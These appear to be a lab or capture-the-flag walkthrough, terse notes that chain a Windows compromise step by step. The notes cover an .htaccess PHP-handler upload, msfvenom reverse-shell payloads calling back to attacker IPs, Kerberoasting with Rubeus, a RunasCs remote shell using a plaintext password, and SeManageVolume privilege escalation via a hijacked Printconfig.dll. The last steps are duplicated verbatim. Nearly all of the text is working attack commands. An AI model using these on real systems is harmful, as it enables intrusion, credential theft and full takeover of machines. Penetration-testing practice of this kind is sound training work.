80
Now we can modify the .htaccess
To create new .htaccess
file:
echo "AddType application/x-httpd-php .evil" > .htaccess
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.45.186 LPORT=4444 > reverse.exe
Now using kerberoasting we got the hash:
.\Rubeus.exe kerberoast /nowrap /tgtdeleg
Now to get a shell as svc_mssql:
import-module .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 cmd.exe -remote 192.168.45.167:1234
Now we can use an exploit: https://github.com/CsEnox/SeManageVolumeExploit/releases Run it first
SeManageVolumeExploit.exe
For Printconfig.dll:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll
Then transfer to machine Then copy it:
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
Then in powershell:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Run it first
SeManageVolumeExploit.exe
For Printconfig.dll:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dll
Then transfer to machine Then copy it:
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\